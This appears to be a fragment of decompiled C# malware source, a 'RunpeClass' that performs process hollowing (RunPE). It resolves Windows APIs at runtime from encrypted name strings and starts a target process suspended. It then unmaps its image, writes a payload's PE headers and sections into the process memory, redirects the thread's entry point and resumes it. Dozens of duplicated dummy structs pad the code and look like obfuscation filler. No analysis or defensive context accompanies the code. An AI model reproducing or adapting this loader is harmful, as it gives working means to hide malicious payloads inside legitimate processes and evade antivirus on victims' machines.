RunpeClass.enx2Ma enx2Ma = RunpeClass.Z8Wro8Mry4Fzhw<RunpeClass.enx2Ma>(RunpeClass.Decrypt("u7Bwqrgr ", "sb2dra0r"), RunpeClass.Decrypt("zsmP0+uy5dOds/WW38uftu631KgQ ", "pN6azMqy0JzCut6OvJa6ttjCzswQ"));
|
|
if (enx2Ma == null)
|
|
throw new NotImplementedException();
|
|
RunpeClass.qh4E qh4E = RunpeClass.Z8Wro8Mry4Fzhw<RunpeClass.qh4E>(RunpeClass.Decrypt("4NOlw5G0ZnsM ", "yr7Y0L7MWlgM"), RunpeClass.Decrypt("tc/Qs+PJo6TWzcyCr98a ", "krjKztCovmi+vsSscNYa"));
|
|
if (qh4E == null)
|
|
throw new NotImplementedException();
|
|
RunpeClass.mzt5Dq mzt5Dq = RunpeClass.Z8Wro8Mry4Fzhw<RunpeClass.mzt5Dq>(RunpeClass.Decrypt("t5p/fLJ8QH8t ", "qZ23r52rOTct"), RunpeClass.Decrypt("z6rnzeXipdbph6vB6Kv72wM= ", "o8flpc3hx7/Fg9vZ5cft5QM="));
|
|
if (mzt5Dq == null)
|
|
throw new NotImplementedException();
|
|
RunpeClass.g4Ch g4Ch = RunpeClass.Z8Wro8Mry4Fzhw<RunpeClass.g4Ch>(RunpeClass.Decrypt("1svIs9KsiWsU ", "wrbQyLbEUlAU"), RunpeClass.Decrypt("n4KynsyukrvAgr16JQ== ", "f6XBxbWlg6u/pZ2jJQ=="));
|
|
if (g4Ch == null)
|
|
throw new NotImplementedException();
|
|
IntPtr system;
|
|
if (-(mrqs((string) null, target, ref process1, ref thread, false, 4U, system, (string) null, ref startup, out info) ? 1 : 0) == 0)
|
|
return;
|
|
RunpeClass.NtHeaders ntHeaders = new RunpeClass.NtHeaders();
|
|
ptr = new IntPtr(int32 + structure1.Address);
|
|
RunpeClass.NtHeaders structure2 = (RunpeClass.NtHeaders) Marshal.PtrToStructure(ptr, ntHeaders.GetType());
|
|
long num1 = 0;
|
|
long num2 = 0;
|
|
startup.CB = Strings.Len((object) startup);
|
|
context.Flags = 65539U;
|
|
if (structure2.Signature != 17744U || structure1.Magic != (ushort) 23117 || -(mrqs((string) null, target, ref process1, ref thread, false, 4U, system, (string) null, ref startup, out info) ? 1 : 0) == 0)
|
|
return;
|
|
int num3;
|
|
if (RunpeClass.Win7())
|
|
{
|
|
int num4 = evzew(info.Thread, ref context) ? 1 : 0;
|
|
RunpeClass.i5Ondq i5Ondq2 = i5Ondq1;
|
|
IntPtr process2 = info.Process;
|
|
int address = (int) ((long) context.Ebx + 8L);
|
|
int num5 = 0;
|
|
ref int local1 = ref num5;
|
|
int num6 = 0;
|
|
ref int local2 = ref num6;
|
|
int num7 = i5Ondq2(process2, address, ref local1, 4, ref local2);
|
|
long num8 = enx2Ma(info.Process, 0);
|
|
}
|
|
else
|
|
{
|
|
int num9 = evzew(info.Thread, ref context) ? 1 : 0;
|
|
RunpeClass.i5Ondq i5Ondq3 = i5Ondq1;
|
|
IntPtr process3 = info.Process;
|
|
int address1 = (int) ((long) context.Ebx + 8L);
|
|
num3 = (int) num1;
|
|
ref int local3 = ref num3;
|
|
int num10 = 0;
|
|
ref int local4 = ref num10;
|
|
int num11 = i5Ondq3(process3, address1, ref local3, 4, ref local4);
|
|
long address2 = (long) num3;
|
|
long num12 = enx2Ma(info.Process, (int) address2);
|
|
}
|
|
uint num13 = (uint) (int) qh4E(info.Process, (int) structure2.Optional.Image, structure2.Optional.SImage, 12288U, 4U);
|
|
if (num13 == 0U)
|
|
return;
|
|
if (RunpeClass.Win7())
|
|
{
|
|
RunpeClass.jx95Iq jx95Iq2 = jx95Iq1;
|
|
IntPtr process4 = info.Process;
|
|
int address = (int) num13;
|
|
byte[] buffer = data;
|
|
int sheaders = (int) structure2.Optional.SHeaders;
|
|
num3 = 0;
|
|
ref int local = ref num3;
|
|
int num14 = jx95Iq2(process4, address, buffer, sheaders, out local) ? 1 : 0;
|
|
}
|
|
else
|
|
{
|
|
RunpeClass.jx95Iq jx95Iq3 = jx95Iq1;
|
|
IntPtr process5 = info.Process;
|
|
int address = (int) num13;
|
|
byte[] buffer = data;
|
|
int sheaders = (int) structure2.Optional.SHeaders;
|
|
num3 = (int) num2;
|
|
ref int local = ref num3;
|
|
int num15 = jx95Iq3(process5, address, buffer, sheaders, out local) ? 1 : 0;
|
|
num2 = (long) num3;
|
|
}
|
|
long num16 = (long) (structure1.Address + 248);
|
|
int num17 = (int) structure2.File.Sections - 1;
|
|
for (int index1 = 0; index1 <= num17; ++index1)
|
|
{
|
|
ptr = new IntPtr((long) int32 + num16 + (long) (index1 * 40));
|
|
RunpeClass.SectionHeader structure3 = (RunpeClass.SectionHeader) Marshal.PtrToStructure(ptr, structure3.GetType());
|
|
byte[] numArray = new byte[(int) structure3.Size + 1];
|
|
int num18 = (int) ((long) structure3.Size - 1L);
|
|
for (int index2 = 0; index2 <= num18; ++index2)
|
|
numArray[index2] = data[(int) ((long) structure3.Pointer + (long) index2)];
|
|
if (RunpeClass.Win7())
|
|
{
|
|
RunpeClass.jx95Iq jx95Iq4 = jx95Iq1;
|
|
IntPtr process6 = info.Process;
|
|
int address = (int) num13 + (int) structure3.Address;
|
|
byte[] buffer = numArray;
|
|
int size = (int) structure3.Size;
|
|
num3 = 0;
|
|
ref int local = ref num3;
|
|
int num19 = jx95Iq4(process6, address, buffer, size, out local) ? 1 : 0;
|
|
}
|
|
else
|
|
{
|
|
RunpeClass.jx95Iq jx95Iq5 = jx95Iq1;
|
|
IntPtr process7 = info.Process;
|
|
int address = (int) num13 + (int) structure3.Address;
|
|
byte[] buffer = numArray;
|
|
int size = (int) structure3.Size;
|
|
num3 = (int) num2;
|
|
ref int local = ref num3;
|
|
int num20 = jx95Iq5(process7, address, buffer, size, out local) ? 1 : 0;
|
|
num2 = (long) num3;
|
|
}
|
|
}
|
|
byte[] bytes = BitConverter.GetBytes(num13);
|
|
RunpeClass.jx95Iq jx95Iq6 = jx95Iq1;
|
|
IntPtr process8 = info.Process;
|
|
int address3 = (int) ((long) context.Ebx + 8L);
|
|
byte[] buffer1 = bytes;
|
|
num3 = 0;
|
|
ref int local5 = ref num3;
|
|
int num21 = jx95Iq6(process8, address3, buffer1, 4, out local5) ? 1 : 0;
|
|
context.Eax = num13 + structure2.Optional.Address;
|
|
int num22 = mzt5Dq(info.Thread, ref context) ? 1 : 0;
|
|
int num23 = (int) g4Ch(info.Thread);
|
|
}
|
|
|
|
[DllImport("kernel32.dll", SetLastError = true)]
|
|
private static extern IntPtr LoadLibraryA(string uj62Piq);
|
|
|
|
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
private static extern IntPtr GetProcAddress(IntPtr handle, string uj62Piq);
|
|
|
|
private static T Z8Wro8Mry4Fzhw<T>(string uj62Piq, string x7FVvcu1Ew)
|
|
{
|
|
if (uj62Piq == null)
|
|
throw new ArgumentNullException(nameof (uj62Piq));
|
|
return x7FVvcu1Ew != null ? (T) Marshal.GetDelegateForFunctionPointer(RunpeClass.GetProcAddress(RunpeClass.LoadLibraryA(uj62Piq), x7FVvcu1Ew), typeof (T)) : throw new ArgumentNullException(nameof (x7FVvcu1Ew));
|
|
}
|
|
|
|
public struct ACL
|
|
{
|
|
public byte AclRevision;
|
|
public byte Sbz1;
|
|
public short AclSize;
|
|
public short AceCount;
|
|
public short Sbz2;
|
|
}
|
|
|
|
public struct GENERIC_MAPPING
|
|
{
|
|
public int GenericRead;
|
|
public int GenericWrite;
|
|
public int GenericExecute;
|
|
public int GenericAll;
|
|
}
|
|
|
|
public struct SECURITY_DESCRIPTOR
|
|
{
|
|
public byte Revision;
|
|
public byte Sbz1;
|
|
public int Control;
|
|
public int Owner;
|
|
public int Group;
|
|
public RunpeClass.ACL Sacl;
|
|
public RunpeClass.ACL Dacl;
|
|
}
|
|
|
|
public struct POINTAPI
|
|
{
|
|
public int x;
|
|
public int y;
|
|
}
|
|
|
|
public struct ACL2
|
|
{
|
|
public byte AclRevision;
|
|
public byte Sbz1;
|
|
public short AclSize;
|
|
public short AceCount;
|
|
public short Sbz2;
|
|
}
|
|
|
|
public struct POINTAPI6
|
|
{
|
|
public int x;
|
|
public int y;
|
|
}
|
|
|
|
public struct ACL3
|
|
{
|
|
public byte AclRevision;
|
|
public byte Sbz1;
|
|
public short AclSize;
|
|
public short AceCount;
|
|
public short Sbz2;
|
|
}
|
|
|
|
public struct ACL5
|
|
{
|
|
public byte AclRevision;
|
|
public byte Sbz1;
|
|
public short AclSize;
|
|
public short AceCount;
|
|
public short Sbz2;
|
|
}
|
|
|
|
public struct LARGE_INTEGER
|
|
{
|
|
public int lowpart;
|
|
public int highpart;
|
|
}
|
|
|
|
public struct PALETTEENTRY
|
|
{
|
|
public byte peRed;
|
|
public byte peGreen;
|
|
public byte peBlue;
|
|
public byte peFlags;
|
|
}
|
|
|
|
public struct COORD
|
|
{
|
|
public short x;
|
|
public short y;
|
|
}
|
|
|
|
public struct EVENTLOGRECORD
|
|
{
|
|
public int Length;
|
|
public int Reserved;
|
|
public int RecordNumber;
|
|
public int TimeGenerated;
|
|
public int TimeWritten;
|
|
public int EventID;
|
|
public short EventStructure;
|
|
public short NumStrings;
|
|
public short EventCategory;
|
|
public short ReservedFlags;
|
|
public int ClosingRecordNumber;
|
|
public int StringOffset;
|
|
public int UserSidLength;
|
|
public int UserSidOffset;
|
|
public int DataLength;
|
|
public int DataOffset;
|
|
}
|
|
|
|
public struct RECT
|
|
{
|
|
public int Left;
|
|
public int Top;
|
|
public int Right;
|
|
public int Bottom;
|
|
}
|
|
|
|
public struct WAVEHDR
|
|
{
|
|
public string lpData;
|
|
public int dwBufferLength;
|
|
public int dwBytesRecorded;
|
|
public int dwUser;
|
|
public int dwFlags;
|
|
public int dwLoops;
|
|
public int lpNext;
|
|
public int Reserved;
|
|
}
|
|
|
|
public struct POINTAPI7
|
|
{
|
|
public int x;
|
|
public int y;
|
|
}
|
|
|
|
public struct CANDIDATEFORM
|
|
{
|
|
public int dwIndex;
|
|
public int dwStyle;
|
|
public RunpeClass.POINTAPI ptCurrentPos;
|
|
public RunpeClass.RECT rcArea;
|
|
}
|
|
|
|
public struct RECT3
|
|
{
|
|
public int Left;
|
|
public int Top;
|
|
public int Right;
|
|
public int Bottom;
|
|
}
|
|
|
|
public struct POINTAPI1
|
|
{
|
|
public int x;
|
|
public int y;
|
|
}
|
|
|
|
public struct COMPOSITIONFORM
|
|
{
|
|
public int dwStyle;
|
|
public RunpeClass.POINTAPI ptCurrentPos;
|
|
public RunpeClass.RECT rcArea;
|
|
}
|
|
|
|
public struct POINTAPI2
|
|
{
|
|
public int x;
|
|
public int y;
|
|
}
|
|
|
|
public struct MIDIHDR
|
|
{
|
|
public string lpData;
|
|
public int dwBufferLength;
|
|
public int dwBytesRecorded;
|
|
public int dwUser;
|
|
public int dwFlags;
|
|
public int lpNext;
|
|
public int Reserved;
|
|
}
|
|
|
|
public struct MIDIINCAPS
|
|
{
|
|
public short wMid;
|
|
public short wPid;
|
|
public int vDriverVersion;
|
|
public string szPname;
|
|
}
|
|
|
|
public struct MIXERCONTROLDETAILS
|
|
{
|
|
public int cbStruct;
|
|
public int dwControlID;
|
|
public int cChannels;
|
|
public int item;
|
|
public int cbDetails;
|
|
public int paDetails;
|
|
}
|
|
|
|
public struct MIXERCAPS
|
|
{
|
|
public short wMid;
|
|
public short wPid;
|
|
public int vDriverVersion;
|
|
public string szPname;
|
|
public int fdwSupport;
|
|
public int cDestinations;
|
|
}
|
|
|
|
public struct MIXERCONTROL
|
|
{
|
|
public int cbStruct;
|
|
public int dwControlID;
|
|
public int dwControlStructure;
|
|
public int fdwControl;
|
|
public int cMultipleItems;
|
|
public string szShortName;
|
|
public string szName;
|
|
public int[] Bounds;
|
|
public int[] Metrics;
|
|
}
|
|
|
|
public struct MIXERLINECONTROLS
|
|
{
|
|
public int cbStruct;
|
|
public int dwLineID;
|
|
public int dwControl;
|
|
public int cControls;
|
|
public int cbmxctrl;
|
|
public RunpeClass.MIXERCONTROL pamxctrl;
|
|
}
|
|
|
|
public struct Context
|
|
{
|
|
public uint Flags;
|
|
public uint D0;
|
|
public uint D1;
|
|
public uint D2;
|
|
public uint D3;
|
|
public uint D6;
|
|
public uint D7;
|
|
public RunpeClass.Save Save;
|
|
public uint SG;
|
|
public uint SF;
|
|
public uint SE;
|
|
public uint SD;
|
|
public uint Edi;
|
|
public uint Esi;
|
|
public uint Ebx;
|
|
public uint Edx;
|
|
public uint Ecx;
|
|
public uint Eax;
|
|
public uint Ebp;
|
|
public uint Eip;
|
|
public uint SC;
|
|
public uint EFlags;
|
|
public uint Esp;
|
|
public uint SS;
|
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
|
|
public byte[] Registers;
|
|
}
|
|
|
|
public struct Save
|
|
{
|
|
public uint Control;
|
|
public uint Status;
|
|
public uint Tag;
|
|
public uint ErrorO;
|
|
public uint ErrorS;
|
|
public uint DataO;
|
|
public uint DataS;
|
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
|
|
public byte[] RegisterArea;
|
|
public uint State;
|
|
}
|
|
|
|
public struct Misc
|
|
{
|
|
public uint Address;
|
|
public uint Size;
|
|
}
|
|
|
|
public struct SectionHeader
|
|
{
|
|
public byte uj62Piq;
|
|
public RunpeClass.Misc Misc;
|
|
public uint Address;
|
|
public uint Size;
|
|
public uint Pointer;
|
|
public uint PRelocations;
|
|
public uint PLines;
|
|
public uint NRelocations;
|
|
public uint NLines;
|
|
public uint Flags;
|
|
}
|
|
|
|
public struct ProcessInformation
|
|
{
|
|
public IntPtr Process;
|
|
public IntPtr Thread;
|
|
public int ProcessId;
|
|
public int ThreadId;
|
|
}
|
|
|
|
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
|
|
public struct StartupInformation
|
|
{
|
|
public int CB;
|
|
public string ReservedA;
|
|
public string Desktop;
|
|
public string Title;
|
|
public int X;
|
|
public int Y;
|
|
public int XSize;
|
|
public int YSize;
|
|
public int XCount;
|
|
public int YCount;
|
|
public int Fill;
|
|
public int Flags;
|
|
public short ShowWindow;
|
|
public short ReservedB;
|
|
public int ReservedC;
|
|
public int input;
|
|
public int Output;
|
|
public int Error;
|
|
}
|
|
|
|
public struct SecurityFlags
|
|
{
|
|
public int Length;
|
|
public IntPtr Descriptor;
|
|
public int Inherit;
|
|
}
|
|
|
|
public struct DosHeader
|
|
{
|
|
public ushort Magic;
|
|
public ushort Last;
|
|
public ushort Pages;
|
|
public ushort Relocations;
|
|
public ushort Size;
|
|
public ushort Minimum;
|
|
public ushort Maximum;
|
|
public ushort SS;
|
|
public ushort SP;
|
|
public ushort Checksum;
|
|
public ushort IP;
|
|
public ushort CS;
|
|
public ushort Table;
|
|
public ushort Overlay;
|
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
|
|
public ushort[] ReservedA;
|
|
public ushort ID;
|
|
public ushort Info;
|
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
|
|
public ushort[] ReservedB;
|
|
public int Address;
|
|
}
|
|
|
|
public struct NtHeaders
|
|
{
|
|
public uint Signature;
|
|
public RunpeClass.File_Header File;
|
|
public RunpeClass.Optional_Headers Optional;
|
|
}
|
|
|
|
public struct File_Header
|
|
{
|
|
public ushort Machine;
|
|
public ushort Sections;
|
|
public uint Stamp;
|
|
public uint Table;
|
|
public uint Symbols;
|
|
public ushort Size;
|
|
public ushort Flags;
|
|
}
|
|
|
|
public struct Optional_Headers
|
|
{
|
|
public ushort Magic;
|
|
public byte Major;
|
|
public byte Minor;
|
|
public uint SCode;
|
|
public uint IData;
|
|
public uint UData;
|
|
public uint Address;
|
|
public uint Code;
|
|
public uint Data;
|
|
public uint Image;
|
|
public uint SectionA;
|
|
public uint FileA;
|
|
public ushort MajorO;
|
|
public ushort MinorO;
|
|
public ushort MajorI;
|
|
public ushort MinorI;
|
|
public ushort MajorS;
|
|
public ushort MinorS;
|
|
public uint Version;
|
|
public uint SImage;
|
|
public uint SHeaders;
|
|
public uint Checksum;
|
|
public ushort Subsystem;
|
|
public ushort Flags;
|
|
public uint SSReserve;
|
|
public uint SSCommit;
|
|
public uint SHReserve;
|
|
public uint SHCommit;
|
|
public uint LFlags;
|
|
public uint Count;
|
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
|
|
public RunpeClass.zz_fn5tlr8gno8w7wc8j[] YZvBm2GrvaOfwbe9yyc;
|
|
}
|
|
|
|
public struct zz_fn5tlr8gno8w7wc8j
|
|
{
|
|
public uint Address;
|
|
public uint Size;
|
|
}
|
|
|
|
public delegate bool mrqs(
|
|
string uj62Piq,
|
|
string command,
|
|
ref RunpeClass.SecurityFlags process,
|
|
ref RunpeClass.SecurityFlags thread,
|
|
bool inherit,
|
|
uint flags,
|
|
IntPtr system,
|
|
string current,
|
|
[In] ref RunpeClass.StartupInformation startup,
|
|
out RunpeClass.ProcessInformation info);
|
|
|
|
public delegate bool jx95Iq(
|
|
IntPtr process,
|
|
int address,
|
|
byte[] buffer,
|
|
int size,
|
|
out int written);
|
|
|
|
public delegate int i5Ondq(
|
|
IntPtr process,
|
|
int address,
|
|
ref int buffer,
|
|
int size,
|
|
ref int read);
|
|
|
|
public delegate IntPtr qh4E(
|
|
IntPtr process,
|
|
int address,
|
|
uint size,
|
|
uint type,
|
|
uint protect);
|
|
|
|
public delegate long enx2Ma(IntPtr process, int address);
|
|
|
|
public delegate uint g4Ch(IntPtr thread);
|
|
|
|
public delegate bool evzew(IntPtr thread, ref RunpeClass.Context context);
|
|
|
|
public delegate bool mzt5Dq(IntPtr thread, ref RunpeClass.Context context);
|
|
}
|
|
}
|